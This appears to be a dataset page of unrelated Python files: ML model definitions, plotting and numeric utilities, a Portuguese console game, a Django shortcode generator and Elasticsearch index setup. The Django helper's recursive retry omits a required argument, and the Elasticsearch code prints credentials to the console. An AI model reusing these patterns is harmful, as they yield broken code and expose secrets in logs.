# filter any examples based on size. Instead, we trim the suffix of the
# source-code sequence or docstring sequence, whichever is longest. This is
# the same logic used by BERT for two-context examples. Note that we trim so
# that the number of tokens plus the three delimiters (one extra between
# function and docstring) is at most `max_graph_size`.
sentences: List[List[str]] = (
code_to_subtokenized_sentences.code_to_cubert_sentences(
function, self.tokenizer, self.subword_text_encoder))
docstring: List[List[str]] = (
code_to_subtokenized_sentences.code_to_cubert_sentences(
f'"""{docstring}"""', self.tokenizer, self.subword_text_encoder))
docstring_tokens = sum(docstring, [])
function_tokens = sum(sentences, [])
# This updates `docstring_tokens` and `function_tokens` in place.
_truncate_seq_pair(docstring_tokens, function_tokens, max_graph_size - 3)
number_of_docstring_tokens = len(docstring_tokens)
number_of_function_tokens = len(function_tokens)
delimited_tokens = tuple(itertools.chain(('[CLS]_',), docstring_tokens,
('[SEP]_',), function_tokens,
('[SEP]_',)))
types = tuple(['DOCSTRING'] * (number_of_docstring_tokens + 2) +
['TOKEN'] * (number_of_function_tokens + 1))
assert len(types) == len(delimited_tokens)
assert len(delimited_tokens) <= max_graph_size
for index, (token, token_type) in enumerate(zip(delimited_tokens, types)):
graph_to_output_example.add_node(
node_id=index, node_type=token_type, node_label=token)
graph_to_output_example.add_class_output(label)
graph_to_output_example.set_provenance(provenance)
return graph_to_output_example
|
def say_hello():
print("Hello World!")
def say_hello_with_name(name):
print(f"Hello {name}!")
|
from funcoes import Funções
import os
class Personagem:
def __init__(self, nome, altura, atributo):
self.nome = nome
self.altura = altura
self.atributo = atributo
def escolhaAtributo(self):
func = Funções(genero='')
if self.atributo == 'Força':
# tecla.play(-1)
frase = f'Você escolheu {self.atributo} cabrunco, você pode se dar melhor arrastando objetos pesados!\n\n'
func.animation(frase)
input("aperte enter para prosseguir...")
# tecla.stop()
os.system('clear')
elif self.atributo == 'Velocidade':
# tecla.play(-1)
frase = f'Você escolheu {self.atributo} cabrunco, você perderá menos tempo a cada escolha\n\n'
func.animation(frase)
# tecla.stop()
input("aperte enter para prosseguir...")
os.system('clear')
elif self.atributo == 'Inteligência':
# tecla.play(-1)
frase = f'Você escolheu {self.atributo} cabrunco, você pensa fora da caixinha! E terá algumas dicas!\n\n'
func.animation(frase)
# tecla.stop()
input("aperte enter para prosseguir...")
os.system('clear')
elif self.atributo == 'Sorte':
# tecla.play(-1)
frase = f'Você escolheu {self.atributo} cabrunco, você pode ter escolhas especiais!\n\n'
func.animation(frase)
# tecla.stop()
input("aperte enter para prosseguir...")
os.system('clear')
|
# -*- coding: utf-8 -*-
import re
import numpy as np
from math import factorial as fac
def numgrab(string, delim=' '):
"""Find the numerical values in a string
"""
strspl = re.split(delim, string)
numlist = []
for s in strspl:
try:
numlist.append(float(s))
except:
pass
return numlist
def arraybin2(arr, rowbin=1, colbin=1):
"""
Binning a 2D array
:Parameters:
arr : numpy array
array to bin
rowbin : int | 1
row binning
colbin : int | 1
column binning
:Return:
arrbinned : numpy array
binned array
"""
oldr, oldc = arr.shape
newr, newc = oldr//rowbin, oldc//colbin
shape = (newr, rowbin, newc, colbin)
arrbinned = arr.reshape(shape).mean(-1).mean(1)
return arrbinned
def cnr(n, r):
""" Calculate the combinatorial coefficient
"""
coef = fac(n) / (fac(r) * fac(n-r))
return int(coef)
def gram_schmidt(M, axis=1):
""" Gram-Schmidt orthonormalization of vectors using QR decomposition
"""
M = np.moveaxis(M, axis, 1)
Q, _ = np.linalg.qr(M)
return Q
|
import glob
import os
import pickle
import numpy as np
import seaborn as sns
from tqdm import tqdm
from matplotlib import pyplot as plt
# Get all event* runs from logging_dir subdirectories
logging_dir = './storage/'
plot_dir = './plots'
clrs = sns.color_palette("husl", 5)
if not os.path.isdir(plot_dir):
os.mkdir(plot_dir)
use_cache = False
result_paths = []
eval_result_paths = []
def walklevel(some_dir, level=1):
some_dir = some_dir.rstrip(os.path.sep)
assert os.path.isdir(some_dir)
num_sep = some_dir.count(os.path.sep)
for root, dirs, files in os.walk(some_dir):
yield root, dirs, files
num_sep_this = root.count(os.path.sep)
if num_sep + level <= num_sep_this:
del dirs[:]
for root, exp_dirs, files in walklevel(logging_dir):
for exp_dir in exp_dirs:
for seed_dir in os.listdir(root + "/" + exp_dir):
result_paths.extend(glob.glob(os.path.join(root, exp_dir, seed_dir, "results.pkl")))
eval_result_paths.extend(glob.glob(os.path.join(root, exp_dir, seed_dir, "eval_results.pkl")))
def print_plot(metric, all_logs):
fig, ax = plt.subplots()
with sns.axes_style("darkgrid"):
for method_name, logs in all_logs.items():
print(f"{method_name}, {metric}")
data = []
for seed in range(len(logs)):
data.append(logs[seed][metric])
print(f"seed: {seed}, len: {len(logs[seed][metric])}")
data = np.array(data)
ax.plot(range(len(data[0])), data.mean(axis=0), label=method_name)# c=clrs[i])
ax.fill_between(range(len(data[0])), data.mean(axis=0)-data.std(axis=0), data.mean(axis=0)+data.std(axis=0), alpha=0.3)#, facecolor=clrs[i])
plt.ylabel(metric)
plt.xlabel("Updates")
plt.legend()
plt.savefig(f"{plot_dir}/{metric}")
plt.clf()
# Call & append
all_logs = {}
all_eval_logs = {}
if not use_cache:
for path in result_paths:
method_name = path.split("/")[2]
seed = path.split("/")[3]
if not all_logs.get(method_name):
all_logs[method_name] = []
log = pickle.load(open(path, 'rb'))
all_logs[method_name].append(log)
pickle.dump(all_logs, open("storage/all_logs.pkl", 'wb'))
for path in eval_result_paths:
method_name = path.split("/")[2]
seed = path.split("/")[3]
if not all_eval_logs.get(method_name):
all_eval_logs[method_name] = []
log = pickle.load(open(path, 'rb'))
all_eval_logs[method_name].append(log)
pickle.dump(all_eval_logs, open("storage/all_eval_logs.pkl", 'wb'))
if use_cache:
all_logs = pickle.load(open("storage/all_logs.pkl", 'rb'))
all_eval_logs = pickle.load(open("storage/all_eval_logs.pkl", 'rb'))
values = print_plot("value", all_logs)
policy_loss = print_plot("policy_loss", all_logs)
value_loss = print_plot("value_loss", all_logs)
return_mean = print_plot("return_mean", all_logs)
rreturn_mean = print_plot("rreturn_mean", all_logs)
FPS = print_plot("FPS", all_logs)
return_per_episode = print_plot("eval_return_per_episode", all_eval_logs)
num_frames_per_episode = print_plot("num_frames_per_episode", all_eval_logs)
|
"""
MIT License
Copyright (c) 2021 Thomas Leong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import torch
import torch.nn.functional as F
from torch import nn
class Market1501TripletModel(nn.Module):
MODEL_NAME = "Self-made cnn"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size,
max_pool_kernel_size,
dropout_rate,
filters=64,
):
super(Market1501TripletModel, self).__init__()
blocks = []
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=filters,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
)
for _ in range(conv_blocks - 1):
blocks.append(self.__conv_block(
in_channels=filters,
out_channels=filters,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone = nn.Sequential(
start_block,
*blocks,
nn.Flatten(),
)
backbone_output_features = self.backbone(torch.rand(input_shape)).shape[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=256),
nn.ReLU(),
nn.Linear(in_features=256, out_features=128),
nn.ReLU(),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size, max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
),
nn.ReLU(),
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(dropout_rate),
)
def forward(self, anchor, true_positive, false_positive):
embedding_anchor = self.model(anchor)
embedding_true = self.model(true_positive)
embedding_false = self.model(false_positive)
anchor_positive_dist = F.pairwise_distance(embedding_anchor, embedding_true)
anchor_negative_dist = F.pairwise_distance(embedding_anchor, embedding_false)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletMiniVGG(nn.Module):
INITIAL_FILTERS = 32
MODEL_NAME = "Mini-VGG"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGG, self).__init__()
self.model_name = "Mini-VGG"
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=Market1501TripletMiniVGG.INITIAL_FILTERS,
conv_kernel_size=conv_kernel_size,
)
self.backbone = nn.Sequential(start_block)
assert conv_blocks % 2 == 0, "Conv blocks must be an even number in MiniVGGNet"
for idx in range(2, conv_blocks + 1):
current_filters_multiply = int(round((idx / 2) + 0.1, 0))
current_filters = Market1501TripletMiniVGG.INITIAL_FILTERS * current_filters_multiply
_, last_output_channels, _, _ = self.__get_last_shape(input_shape, self.backbone)
self.backbone.add_module(f'Block:{idx}', self.__conv_block(
in_channels=last_output_channels,
out_channels=current_filters,
conv_kernel_size=conv_kernel_size,
))
if idx % 2 == 0:
self.backbone.add_module(f'Pool:{current_filters_multiply}', self.__pool_block(
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone.add_module('Flatten', nn.Flatten())
backbone_output_features = self.__get_last_shape(input_shape, self.backbone)[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=512),
nn.ReLU(),
nn.BatchNorm1d(num_features=512),
nn.Linear(in_features=512, out_features=128),
nn.ReLU(),
nn.BatchNorm1d(num_features=128),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __get_last_shape(input_shape, block):
return block(torch.rand(input_shape)).shape
@staticmethod
def __pool_block(max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(p=dropout_rate)
)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
bias=True
),
nn.ReLU(),
nn.BatchNorm2d(num_features=out_channels)
)
def forward(self, anchor, positive, negative):
anchor_emd = self.model(anchor)
positive_emd = self.model(positive)
negative_emd = self.model(negative)
anchor_positive_dist = F.pairwise_distance(anchor_emd, positive_emd)
anchor_negative_dist = F.pairwise_distance(anchor_emd, negative_emd)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletModelEval(Market1501TripletModel):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletModelEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
class Market1501TripletMiniVGGEval(Market1501TripletMiniVGG):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
class Market1501TripletMiniVGGReluBeforeBN(nn.Module):
INITIAL_FILTERS = 32
MODEL_NAME = "Mini-VGG"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGReluBeforeBN, self).__init__()
self.model_name = "Mini-VGG"
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=Market1501TripletMiniVGG.INITIAL_FILTERS,
conv_kernel_size=conv_kernel_size,
)
self.backbone = nn.Sequential(start_block)
assert conv_blocks % 2 == 0, "Conv blocks must be an even number in MiniVGGNet"
for idx in range(2, conv_blocks + 1):
current_filters_multiply = int(round((idx / 2) + 0.1, 0))
current_filters = Market1501TripletMiniVGG.INITIAL_FILTERS * current_filters_multiply
_, last_output_channels, _, _ = self.__get_last_shape(input_shape, self.backbone)
self.backbone.add_module(f'Block:{idx}', self.__conv_block(
in_channels=last_output_channels,
out_channels=current_filters,
conv_kernel_size=conv_kernel_size,
))
if idx % 2 == 0:
self.backbone.add_module(f'Pool:{current_filters_multiply}', self.__pool_block(
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone.add_module('Flatten', nn.Flatten())
backbone_output_features = self.__get_last_shape(input_shape, self.backbone)[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=512),
nn.BatchNorm1d(num_features=512),
nn.ReLU(),
nn.Linear(in_features=512, out_features=128),
nn.BatchNorm1d(num_features=128),
nn.ReLU(),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __get_last_shape(input_shape, block):
return block(torch.rand(input_shape)).shape
@staticmethod
def __pool_block(max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(p=dropout_rate)
)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
bias=True
),
nn.BatchNorm2d(num_features=out_channels),
nn.ReLU()
)
def forward(self, anchor, positive, negative):
anchor_emd = self.model(anchor)
positive_emd = self.model(positive)
negative_emd = self.model(negative)
anchor_positive_dist = F.pairwise_distance(anchor_emd, positive_emd)
anchor_negative_dist = F.pairwise_distance(anchor_emd, negative_emd)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletMiniVGGReluBeforeBnEval(Market1501TripletMiniVGGReluBeforeBN):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGReluBeforeBnEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
if __name__ == '__main__':
from torchinfo import summary
input_shape = (1, 3, 128, 64)
model = Market1501TripletMiniVGG(
input_shape,
embedding_dim=32,
conv_blocks=2,
)
summary(model, (input_shape, input_shape, input_shape))
|
import string
import random
from django.conf import settings
SHORTCODE_MIN = getattr(settings,"SHORTCODE_MIN",6)
def code_generator(size = SHORTCODE_MIN, chars=string.ascii_lowercase + string.digits):
new_code = ''
for _ in range(size):
new_code += random.choice(chars)
return new_code
# or we simply write
# return ''.join(random.choice(chars) for _ in range(size))
def create_shortcode(instance, size=SHORTCODE_MIN):
new_code = code_generator(size=size)
Klass = instance.__class__
qs_exists = Klass.objects.filter(shortcode = new_code).exists()
if qs_exists:
return create_shortcode(size=size)
return new_code
|
import json
import time
import requests # TODO use only until python lib supports ILM
from requests.auth import HTTPBasicAuth # TODO use only until python lib supports ILM
def _put_towers_mapping(es):
if not es.indices.exists('towers'):
with open('./utilities/config/cell_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.create('towers', body=mapping)
print('Configured "towers" mapping')
else:
print('"towers" mapping already configured')
def _put_waps_mapping(es):
if not es.indices.exists('waps'):
with open('./utilities/config/waps_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.create('waps', body=mapping)
print('Configured "waps" mapping')
else:
print('"waps" mapping already configured')
def _put_network_activity_mapping(es, temp_es_host, temp_es_user, temp_es_password):
# Configure ILM
# TODO remove requests call when Python lib supports ILM
try:
r = requests.get('{}/_ilm/policy'.format(temp_es_host), auth=HTTPBasicAuth(temp_es_user, temp_es_password))
r = r.json()['network_events']
except KeyError:
with open('./utilities/config/network_events_ilm_policy.json', 'r') as f:
ilm_policy = json.load(f)
print(temp_es_user, temp_es_password, temp_es_host)
r = requests.put(
'{}/_ilm/policy/network_events'.format(temp_es_host),
auth=HTTPBasicAuth(temp_es_user, temp_es_password),
json=ilm_policy
)
print(r.json())
assert r.status_code == 200
# Configure Index Template
if not es.indices.exists_template('network_events'):
with open('./utilities/config/network_events_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.put_template('network_events', body=mapping)
print('Configured "network_events" template')
else:
print('"network_events" template already configured')
# Bootstrap the first index for ILM rollover purposes if the alias does not exist
if not es.indices.exists_alias('network_events'):
with open('./utilities/config/network_events_bootstrap.json', 'r') as f:
bootstrap = json.load(f)
es.indices.create(index='network_events-000001', body=bootstrap)
def put_all_mappings(es, temp_es_host, temp_es_user, temp_es_password):
_put_towers_mapping(es)
_put_waps_mapping(es)
_put_network_activity_mapping(es, temp_es_host, temp_es_user, temp_es_password)
time.sleep(1)
|
# -*- coding: utf-8 -*-
import numpy as np
#---------------------------------------------------
class RateDecay(object):
'''Basic class for different types of rate decay,
e.g., teach forcing ratio, gumbel temperature,
KL annealing.
'''
def __init__(self, burn_down_steps, decay_steps, limit_v):
self.step = 0
self.rate = 1.0
self.burn_down_steps = burn_down_steps
self.decay_steps = decay_steps
self.limit_v = limit_v
def decay_funtion(self):
# to be reconstructed
return self.rate
def do_step(self):
# update rate
self.step += 1
if self.step > self.burn_down_steps:
self.rate = self.decay_funtion()
return self.rate
def get_rate(self):
return self.rate
class ExponentialDecay(RateDecay):
def __init__(self, burn_down_steps, decay_steps, min_v):
super(ExponentialDecay, self).__init__(
burn_down_steps, decay_steps, min_v)
self.__alpha = np.log(self.limit_v) / (-decay_steps)
def decay_funtion(self):
new_rate = max(np.exp(-self.__alpha*self.step), self.limit_v)
return new_rate
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.